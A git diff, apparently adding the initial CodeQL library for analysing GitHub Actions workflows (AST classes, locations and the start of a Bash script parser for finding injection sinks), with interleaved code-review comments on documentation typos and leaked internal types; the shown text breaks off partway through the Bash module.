diff --git a/.github/workflows/check-qldoc.yml b/.github/workflows/check-qldoc.yml index e64d661c7911..f10e0dc90b99 100644 --- a/.github/workflows/check-qldoc.yml +++ b/.github/workflows/check-qldoc.yml @@ -30,7 +30,8 @@ jobs: run: | EXIT_CODE=0 # TODO: remove the shared exception from the regex when coverage of qlpacks without dbschemes is supported - changed_lib_packs="$(git diff --name-only --diff-filter=ACMRT HEAD^ HEAD | { grep -Po '^(?!(shared))[a-z]*/ql/lib' || true; } | sort -u)" + # TODO: remove the actions exception once https://github.com/github/codeql-team/issues/3656 is fixed + changed_lib_packs="$(git diff --name-only --diff-filter=ACMRT HEAD^ HEAD | { grep -Po '^(?!(shared|actions))[a-z]*/ql/lib' || true; } | sort -u)" for pack_dir in ${changed_lib_packs}; do lang="${pack_dir%/ql/lib}" codeql generate library-doc-coverage --output="${RUNNER_TEMP}/${lang}-current.txt" --dir="${pack_dir}" diff --git a/actions/ql/lib/actions.qll b/actions/ql/lib/actions.qll index 073277dcace0..2c1d1cee9259 100644 --- a/actions/ql/lib/actions.qll +++ b/actions/ql/lib/actions.qll @@ -1 +1 @@ -predicate placeholder(int x) { x = 0 } +import codeql.actions.Ast diff --git a/actions/ql/lib/change-notes/2024-12-19-initial-release.md b/actions/ql/lib/change-notes/2024-12-19-initial-release.md new file mode 100644 index 000000000000..09263f5089d2 --- /dev/null +++ b/actions/ql/lib/change-notes/2024-12-19-initial-release.md @@ -0,0 +1,4 @@ +--- +category: feature +--- +* Initial public preview release diff --git a/actions/ql/lib/codeql-pack.lock.yml b/actions/ql/lib/codeql-pack.lock.yml new file mode 100644 index 000000000000..53004274575d --- /dev/null +++ b/actions/ql/lib/codeql-pack.lock.yml @@ -0,0 +1,4 @@ +--- +lockVersion: 1.0.0 +dependencies: {} +compiled: false diff --git a/actions/ql/lib/codeql/Locations.qll b/actions/ql/lib/codeql/Locations.qll new file mode 100644 index 000000000000..96b5d45f18e0 --- /dev/null +++ b/actions/ql/lib/codeql/Locations.qll 
@@ -0,0 +1,98 @@ +/** Provides classes for working with locations. */ + +import files.FileSystem +import codeql.actions.ast.internal.Ast + +bindingset[loc] +pragma[inline_late] +private string locationToString(Location loc) { + exists(string filepath, int startline, int startcolumn, int endline, int endcolumn | + loc.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) and + result = filepath + "@" + startline + ":" + startcolumn + ":" + endline + ":" + endcolumn + ) +} + +newtype TLocation = + TBaseLocation(string filepath, int startline, int startcolumn, int endline, int endcolumn) { + exists(File file | + file.getAbsolutePath() = filepath and + locations_default(_, file, startline, startcolumn, endline, endcolumn) + ) + or + exists(ExpressionImpl e | + e.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) + ) + or + filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 + } + +/** + * A location as given by a file, a start line, a start column, + * an end line, and an end column. + * + * For more information about locations see [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +class Location extends TLocation, TBaseLocation { + string filepath; + int startline; + int startcolumn; + int endline; + int endcolumn; + + Location() { this = TBaseLocation(filepath, startline, startcolumn, endline, endcolumn) } + + /** Gets the file for this location. */ + File getFile() { + exists(File file | + file.getAbsolutePath() = filepath and + result = file + ) + } + + /** Gets the 1-based line number (inclusive) where this location starts. */ + int getStartLine() { result = startline } + + /** Gets the 1-based column number (inclusive) where this location starts. */ + int getStartColumn() { result = startcolumn } + + /** Gets the 1-based line number (inclusive) where this.getLocationDefault() location ends. 
*/ + int getEndLine() { result = endline } + + /** Gets the 1-based column number (inclusive) where this.getLocationDefault() location ends. */ + int getEndColumn() { result = endcolumn } + + /** Gets the number of lines covered by this location. */ + int getNumLines() { result = endline - startline + 1 } + + /** Gets a textual representation of this element. */ + pragma[inline] + string toString() { result = locationToString(this) } + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Providing locations in CodeQL queries](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo(string p, int sl, int sc, int el, int ec) { + p = filepath and + sl = startline and + sc = startcolumn and + el = endline and + ec = endcolumn + } + + /** Holds if this location starts strictly before the specified location. */ + pragma[inline] + predicate strictlyBefore(Location other) { + this.getStartLine() < other.getStartLine() + or + this.getStartLine() = other.getStartLine() and this.getStartColumn() < other.getStartColumn() + } +} + +/** An entity representing an empty location. */ +class EmptyLocation extends Location { + EmptyLocation() { this.hasLocationInfo("", 0, 0, 0, 0) } +} diff --git a/actions/ql/lib/codeql/actions/Ast.qll b/actions/ql/lib/codeql/actions/Ast.qll new file mode 100644 index 000000000000..8c1925f3288c --- /dev/null +++ b/actions/ql/lib/codeql/actions/Ast.qll 
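Review bot: The QLDoc on `getEndLine` and `getEndColumn` reads "where this.getLocationDefault() location ends", which looks like a paste artifact from another pack's Locations.qll rather than a description of this class; the sibling `getStartLine`/`getStartColumn` comments read "where this location starts". Change the two comments to `/** Gets the 1-based line number (inclusive) where this location ends. */` and `/** Gets the 1-based column number (inclusive) where this location ends. */`. Note that the check-qldoc workflow changed in this same commit excludes the `actions` pack from coverage checking, so documentation problems in this file will not be flagged automatically.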
@@ -0,0 +1,400 @@ +private import codeql.actions.ast.internal.Ast +private import codeql.Locations +import codeql.actions.Helper + +class AstNode instanceof AstNodeImpl { + AstNode getAChildNode() { result = super.getAChildNode() } + + AstNode getParentNode() { result = super.getParentNode() } + + string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } + + Location getLocation() { result = super.getLocation() } + + string toString() { result = super.toString() } + + Step getEnclosingStep() { result = super.getEnclosingStep() } + + Job getEnclosingJob() { result = super.getEnclosingJob() } + + Event getATriggerEvent() { result = super.getATriggerEvent() } + + Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() } + + CompositeAction getEnclosingCompositeAction() { result = super.getEnclosingCompositeAction() } + + Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } + + ScalarValue getInScopeDefaultValue(string name, string prop) { + result = super.getInScopeDefaultValue(name, prop) + } +} + +class ScalarValue extends AstNode instanceof ScalarValueImpl { + string getValue() { result = super.getValue() } +} + +class Expression extends AstNode instanceof ExpressionImpl { + string expression; + string rawExpression; + + Expression() { + expression = this.getExpression() and + rawExpression = this.getRawExpression() + } + + string getExpression() { result = expression } + + string getRawExpression() { result = rawExpression } + + string getNormalizedExpression() { result = normalizeExpr(expression) } +} + +/** A common class for `env` in workflow, job or step. */ +abstract class Env extends AstNode instanceof EnvImpl { + /** Gets an environment variable value given its name. */ + ScalarValueImpl getEnvVarValue(string name) { result = super.getEnvVarValue(name) } + + /** Gets an environment variable value. 
*/ + ScalarValueImpl getAnEnvVarValue() { result = super.getAnEnvVarValue() } + + /** Gets an environment variable expressin given its name. */ + ExpressionImpl getEnvVarExpr(string name) { result = super.getEnvVarExpr(name) } + + /** Gets an environment variable expression. */ + ExpressionImpl getAnEnvVarExpr() { result = super.getAnEnvVarExpr() } +} + +/** + * A custom composite action. This is a mapping at the top level of an Actions YAML action file. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. + */ +class CompositeAction extends AstNode instanceof CompositeActionImpl { + Runs getRuns() { result = super.getRuns() } + + Outputs getOutputs() { result = super.getOutputs() } + + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } + + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } + + Input getAnInput() { result = super.getAnInput() } + + Input getInput(string inputName) { result = super.getInput(inputName) } + + LocalJob getACallerJob() { result = super.getACallerJob() } + + UsesStep getACallerStep() { result = super.getACallerStep() } + + predicate isPrivileged() { super.isPrivileged() } +} + +/** + * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. 
+ */ +class Workflow extends AstNode instanceof WorkflowImpl { + Env getEnv() { result = super.getEnv() } + + string getName() { result = super.getName() } + + Job getAJob() { result = super.getAJob() } + + Job getJob(string jobId) { result = super.getJob(jobId) } + + Permissions getPermissions() { result = super.getPermissions() } + + Strategy getStrategy() { result = super.getStrategy() } + + On getOn() { result = super.getOn() } +} + +class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { + Outputs getOutputs() { result = super.getOutputs() } + + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } + + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } + + Input getAnInput() { result = super.getAnInput() } + + Input getInput(string inputName) { result = super.getInput(inputName) } + + ExternalJob getACaller() { result = super.getACaller() } +} + +class Input extends AstNode instanceof InputImpl { } + +class Default extends AstNode instanceof DefaultsImpl { + ScalarValue getValue(string name, string prop) { result = super.getValue(name, prop) } +} + +class Outputs extends AstNode instanceof OutputsImpl { + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } + + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } + + override string toString() { result = "Job outputs node" } +} + +class Permissions extends AstNode instanceof PermissionsImpl { + bindingset[perm] + string getPermission(string perm) { result = super.getPermission(perm) } + + string getAPermission() { result = super.getAPermission() } +} + +class Strategy extends AstNode instanceof StrategyImpl { + Expression getMatrixVarExpr(string varName) { result = super.getMatrixVarExpr(varName) } + + Expression getAMatrixVarExpr() { result = super.getAMatrixVarExpr() } +} + +/** + * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds + */ 
+class Needs extends AstNode instanceof NeedsImpl { + Job getANeededJob() { result = super.getANeededJob() } +} + +class On extends AstNode instanceof OnImpl { + Event getAnEvent() { result = super.getAnEvent() } +} + +class Event extends AstNode instanceof EventImpl { + string getName() { result = super.getName() } + + string getAnActivityType() { result = super.getAnActivityType() } + + string getAPropertyValue(string prop) { result = super.getAPropertyValue(prop) } + + predicate hasProperty(string prop) { super.hasProperty(prop) } + + predicate isExternallyTriggerable() { super.isExternallyTriggerable() } + + predicate isPrivileged() { super.isPrivileged() } +} + +/** + * An Actions job within a workflow. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. + */ +abstract class Job extends AstNode instanceof JobImpl { + string getId() { result = super.getId() } + + Workflow getWorkflow() { result = super.getWorkflow() } + + Job getANeededJob() { result = super.getANeededJob() } + + Outputs getOutputs() { result = super.getOutputs() } + + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } + + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } + + Env getEnv() { result = super.getEnv() } + + If getIf() { result = super.getIf() } + + Environment getEnvironment() { result = super.getEnvironment() } + + Permissions getPermissions() { result = super.getPermissions() } + + Strategy getStrategy() { result = super.getStrategy() } + + string getARunsOnLabel() { result = super.getARunsOnLabel() } + + predicate isPrivileged() { super.isPrivileged() } + + predicate isPrivilegedExternallyTriggerable(Event event) { + super.isPrivilegedExternallyTriggerable(event) + } +} + +abstract class StepsContainer extends AstNode instanceof StepsContainerImpl { + Step getAStep() { result = super.getAStep() } + + Step getStep(int i) { result = super.getStep(i) } +} + +/** + * An `runs` mapping in 
a custom composite action YAML. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs + */ +class Runs extends StepsContainer instanceof RunsImpl { + CompositeAction getAction() { result = super.getAction() } +} + +/** + * An Actions job within a workflow which is composed of steps. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. + */ +class LocalJob extends Job, StepsContainer instanceof LocalJobImpl { } + +/** + * A step within an Actions job. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. + */ +class Step extends AstNode instanceof StepImpl { + string getId() { result = super.getId() } + + Env getEnv() { result = super.getEnv() } + + If getIf() { result = super.getIf() } + + StepsContainer getContainer() { result = super.getContainer() } + + Step getNextStep() { result = super.getNextStep() } + + Step getAFollowingStep() { result = super.getAFollowingStep() } +} + +/** + * An If node representing a conditional statement. + */ +class If extends AstNode instanceof IfImpl { + string getCondition() { result = super.getCondition() } + + Expression getConditionExpr() { result = super.getConditionExpr() } + + string getConditionStyle() { result = super.getConditionStyle() } +} + +/** + * An Environemnt node representing a deployment environment. 
+ */ +class Environment extends AstNode instanceof EnvironmentImpl { + string getName() { result = super.getName() } + + Expression getNameExpr() { result = super.getNameExpr() } +} + +abstract class Uses extends AstNode instanceof UsesImpl { + string getCallee() { result = super.getCallee() } + + ScalarValue getCalleeNode() { result = super.getCalleeNode() } + + string getVersion() { result = super.getVersion() } + + int getMajorVersion() { result = super.getMajorVersion() } + + string getArgument(string argName) { result = super.getArgument(argName) } + + Expression getArgumentExpr(string argName) { result = super.getArgumentExpr(argName) } +} + +class UsesStep extends Step, Uses instanceof UsesStepImpl { } + +class ExternalJob extends Job, Uses instanceof ExternalJobImpl { } + +/** + * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. 
+ */ +class Run extends Step instanceof RunImpl { + ShellScript getScript() { result = super.getScript() } + + Expression getAnScriptExpr() { result = super.getAnScriptExpr() } + + string getWorkingDirectory() { result = super.getWorkingDirectory() } + + string getShell() { result = super.getShell() } +} + +class ShellScript extends ScalarValueImpl instanceof ShellScriptImpl { + string getRawScript() { result = super.getRawScript() } + + string getStmt(int i) { result = super.getStmt(i) } + + string getAStmt() { result = super.getAStmt() } + + string getCommand(int i) { result = super.getCommand(i) } + + string getACommand() { result = super.getACommand() } + + string getFileReadCommand(int i) { result = super.getFileReadCommand(i) } + + string getAFileReadCommand() { result = super.getAFileReadCommand() } + + predicate getAssignment(int i, string name, string data) { super.getAssignment(i, name, data) } + + predicate getAnAssignment(string name, string data) { super.getAnAssignment(name, data) } + + predicate getAWriteToGitHubEnv(string name, string data) { + super.getAWriteToGitHubEnv(name, data) + } + + predicate getAWriteToGitHubOutput(string name, string data) { + super.getAWriteToGitHubOutput(name, data) + } + + predicate getAWriteToGitHubPath(string data) { super.getAWriteToGitHubPath(data) } + + predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { + super.getAnEnvReachingGitHubOutputWrite(var, output_field) + } + + predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { + super.getACmdReachingGitHubOutputWrite(cmd, output_field) + } + + predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { + super.getAnEnvReachingGitHubEnvWrite(var, output_field) + } + + predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { + super.getACmdReachingGitHubEnvWrite(cmd, output_field) + } + + predicate getAnEnvReachingGitHubPathWrite(string var) { + 
super.getAnEnvReachingGitHubPathWrite(var) + } + + predicate getACmdReachingGitHubPathWrite(string cmd) { super.getACmdReachingGitHubPathWrite(cmd) } + + predicate getAnEnvReachingArgumentInjectionSink(string var, string command, string argument) { + super.getAnEnvReachingArgumentInjectionSink(var, command, argument) + } + + predicate getACmdReachingArgumentInjectionSink(string cmd, string command, string argument) { + super.getACmdReachingArgumentInjectionSink(cmd, command, argument) + } + + predicate fileToGitHubEnv(string path) { super.fileToGitHubEnv(path) } + + predicate fileToGitHubOutput(string path) { super.fileToGitHubOutput(path) } + + predicate fileToGitHubPath(string path) { super.fileToGitHubPath(path) } +} + +abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { + string getFieldName() { result = super.getFieldName() } + + AstNode getTarget() { result = super.getTarget() } +} + +class JsonReferenceExpression extends AstNode instanceof JsonReferenceExpressionImpl { + string getAccessPath() { result = super.getAccessPath() } + + string getInnerExpression() { result = super.getInnerExpression() } +} + +class GitHubExpression extends SimpleReferenceExpression instanceof GitHubExpressionImpl { } + +class SecretsExpression extends SimpleReferenceExpression instanceof SecretsExpressionImpl { } + +class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { + string getStepId() { result = super.getStepId() } +} + +class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { + string getNeededJobId() { result = super.getNeededJobId() } +} + +class JobsExpression extends SimpleReferenceExpression instanceof JobsExpressionImpl { } + +class InputsExpression extends SimpleReferenceExpression instanceof InputsExpressionImpl { } + +class EnvExpression extends SimpleReferenceExpression instanceof EnvExpressionImpl { } + +class MatrixExpression extends 
SimpleReferenceExpression instanceof MatrixExpressionImpl { } diff --git a/actions/ql/lib/codeql/actions/Bash.qll b/actions/ql/lib/codeql/actions/Bash.qll new file mode 100644 index 000000000000..7f2d4aeef9c3 --- /dev/null +++ b/actions/ql/lib/codeql/actions/Bash.qll 
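Review bot: `Env` leaks the private `*Impl` types into its public signatures — `getEnvVarValue`/`getAnEnvVarValue` return `ScalarValueImpl` and `getEnvVarExpr`/`getAnEnvVarExpr` return `ExpressionImpl` — even though `codeql.actions.ast.internal.Ast` is only privately imported here and every other wrapper in the file returns the public class (e.g. `AstNode.getInScopeDefaultValue` returns `ScalarValue`, `Job.getEnv` returns `Env`); the same applies to `class ShellScript extends ScalarValueImpl`, which presumably should extend `ScalarValue` so that `Run.getScript()` results are `AstNode`s with `getLocation()`. Following the pattern used elsewhere in the file: `ScalarValue getEnvVarValue(string name) { result = super.getEnvVarValue(name) }`, `Expression getEnvVarExpr(string name) { result = super.getEnvVarExpr(name) }` and `class ShellScript extends ScalarValue instanceof ShellScriptImpl {` (likewise for the two `getAn*` members). Separately, most public classes in this file (`AstNode`, `ScalarValue`, `Expression`, `Input`, `Uses`, `Permissions`, the `*Expression` classes) carry no QLDoc, and since the check-qldoc workflow in this commit excludes the `actions` pack from coverage, that gap is not enforced by CI. The comments that do exist have typos worth fixing before release: "expressin" → "expression" on `Env.getEnvVarExpr`, "Environemnt" → "Environment" on `Environment`, and "An `runs` mapping" → "A `runs` mapping" on `Runs`.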
@@ -0,0 +1,722 @@ +private import codeql.actions.Ast + +class BashShellScript extends ShellScript { + BashShellScript() { + exists(Run run | + this = run.getScript() and + run.getShell().matches(["bash%", "sh"]) + ) + } + + private string lineProducer(int i) { + result = this.getRawScript().regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n", i) + } + + private predicate cmdSubstitutionReplacement(string cmdSubs, string id, int k) { + exists(string line | line = this.lineProducer(k) | + exists(int i, int j | + cmdSubs = + // $() cmd substitution + line.regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", i, j) + .regexpReplaceAll("^\\$\\(", "") + .regexpReplaceAll("\\)$", "") and + id = "cmdsubs:" + k + ":" + i + ":" + j + ) + or + exists(int i, int j | + // `...` cmd substitution + cmdSubs = + line.regexpFind("\\`[^\\`]+\\`", i, j) + .regexpReplaceAll("^\\`", "") + .regexpReplaceAll("\\`$", "") and + id = "cmd:" + k + ":" + i + ":" + j + ) + ) + } + + private predicate rankedCmdSubstitutionReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.cmdSubstitutionReplacement(old2, _, _) | old2) and + this.cmdSubstitutionReplacement(old, new, _) + } + + private predicate doReplaceCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.lineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string cmdSubstitutedLineProducer(int i) { + // script lines where any command substitution has been replaced with a unique placeholder + result = + max(int round, string new | + this.doReplaceCmdSubstitutions(i, round, _, new) + | + new order by round + ) + or + this.cmdSubstitutionReplacement(result, _, i) + } + + private predicate 
quotedStringReplacement(string quotedStr, string id) { + exists(string line, int k | line = this.cmdSubstitutedLineProducer(k) | + exists(int i, int j | + // double quoted string + quotedStr = line.regexpFind("\"((?:[^\"\\\\]|\\\\.)*)\"", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + or + exists(int i, int j | + // single quoted string + quotedStr = line.regexpFind("'((?:\\\\.|[^'\\\\])*)'", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + ) + } + + private predicate rankedQuotedStringReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.quotedStringReplacement(old2, _) | old2) and + this.quotedStringReplacement(old, new) + } + + private predicate doReplaceQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdSubstitutedLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string quotedStringLineProducer(int i) { + result = + max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) + } + + private string stmtProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparator()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::splitSeparator()) > -1 + } + + private predicate doStmtRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.stmtProducer(line) and + new 
= old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doStmtRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredStmtQuotedStringLineProducer(int i) { + result = + max(int round, string new | + this.doStmtRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) and + not result.indexOf("qstr:") > -1 + } + + private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredStmtQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doStmtRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + override string getStmt(int i) { + result = + max(int round, string new | + this.doStmtRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) and + not result.indexOf("cmdsubs:") > -1 + } + + override string getAStmt() { result = this.getStmt(_) } + + private string cmdProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::separator()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::separator()) > -1 + } + + private predicate doCmdRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) 
and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredCmdQuotedStringLineProducer(int i) { + result = + max(int round, string new | + this.doCmdRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) and + not result.indexOf("qstr:") > -1 + } + + private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredCmdQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + string getCmd(int i) { + result = + max(int round, string new | + this.doCmdRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) and + not result.indexOf("cmdsubs:") > -1 + } + + string getACmd() { result = this.getCmd(_) } + + override string getCommand(int i) { + // remove redirection + result = + this.getCmd(i) + .regexpReplaceAll("(>|>>|2>|2>>|<|<<<)\\s*[\\{\\}\\$\"'_\\-0-9a-zA-Z]+$", "") + .trim() and + // exclude variable declarations + not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and + // exclude comments + not result.trim().indexOf("#") = 0 and + // exclude the following keywords + not result = + [ + "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", "case", + "esac", "{", "}" + ] + } + + override string getACommand() { result = this.getCommand(_) } + + override string getFileReadCommand(int i) { + result = this.getStmt(i) and + result.matches(Bash::fileReadCommand() + "%") + } + + override string getAFileReadCommand() { result = this.getFileReadCommand(_) } + + override predicate getAssignment(int i, string name, string data) { + exists(string stmt | + stmt = this.getStmt(i) and + name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and + data = 
stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + ) + } + + override predicate getAnAssignment(string name, string data) { this.getAssignment(_, name, data) } + + override predicate getAWriteToGitHubEnv(string name, string data) { + exists(string raw | + Bash::extractFileWrite(this, "GITHUB_ENV", raw) and + Bash::extractVariableAndValue(raw, name, data) + ) + } + + override predicate getAWriteToGitHubOutput(string name, string data) { + exists(string raw | + Bash::extractFileWrite(this, "GITHUB_OUTPUT", raw) and + Bash::extractVariableAndValue(raw, name, data) + ) + } + + override predicate getAWriteToGitHubPath(string data) { + Bash::extractFileWrite(this, "GITHUB_PATH", data) + } + + override predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_OUTPUT", output_field) + } + + override predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_OUTPUT", output_field) + } + + override predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_ENV", output_field) + } + + override predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_ENV", output_field) + } + + override predicate getAnEnvReachingGitHubPathWrite(string var) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_PATH", _) + } + + override predicate getACmdReachingGitHubPathWrite(string cmd) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_PATH", _) + } + + override predicate getAnEnvReachingArgumentInjectionSink( + string var, string command, string argument + ) { + Bash::envReachingArgumentInjectionSink(this, var, command, argument) + } + + override predicate getACmdReachingArgumentInjectionSink( + string cmd, string command, string argument + ) { + Bash::cmdReachingArgumentInjectionSink(this, cmd, 
command, argument) + } + + override predicate fileToGitHubEnv(string path) { + Bash::fileToFileWrite(this, "GITHUB_ENV", path) + } + + override predicate fileToGitHubOutput(string path) { + Bash::fileToFileWrite(this, "GITHUB_OUTPUT", path) + } + + override predicate fileToGitHubPath(string path) { + Bash::fileToFileWrite(this, "GITHUB_PATH", path) + } +} + +module Bash { + string stmtSeparator() { result = ";" } + + string commandSeparator() { result = ["&&", "||"] } + + string splitSeparator() { + result = stmtSeparator() or + result = commandSeparator() + } + + string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } + + string pipeSeparator() { result = "|" } + + string separator() { + result = stmtSeparator() or + result = commandSeparator() or + result = pipeSeparator() + } + + string fileReadCommand() { result = ["<", "cat", "jq", "yq", "tail", "head"] } + + /** Checks if expr is a bash command substitution */ + bindingset[expr] + predicate isCmdSubstitution(string expr, string cmd) { + exists(string regexp | + // $(cmd) + regexp = "\\$\\(([^)]+)\\)" and + cmd = expr.regexpCapture(regexp, 1) + or + // `cmd` + regexp = "`([^`]+)`" and + cmd = expr.regexpCapture(regexp, 1) + ) + } + + /** Checks if expr is a bash command substitution */ + bindingset[expr] + predicate containsCmdSubstitution(string expr, string cmd) { + exists(string regexp | + // $(cmd) + regexp = ".*\\$\\(([^)]+)\\).*" and + cmd = expr.regexpCapture(regexp, 1).trim() + or + // `cmd` + regexp = ".*`([^`]+)`.*" and + cmd = expr.regexpCapture(regexp, 1).trim() + ) + } + + /** Checks if expr is a bash parameter expansion */ + bindingset[expr] + predicate isParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = 
"\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) + ) + } + + bindingset[expr] + predicate containsParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = ".*\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = ".*\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = ".*\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}.*" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... 
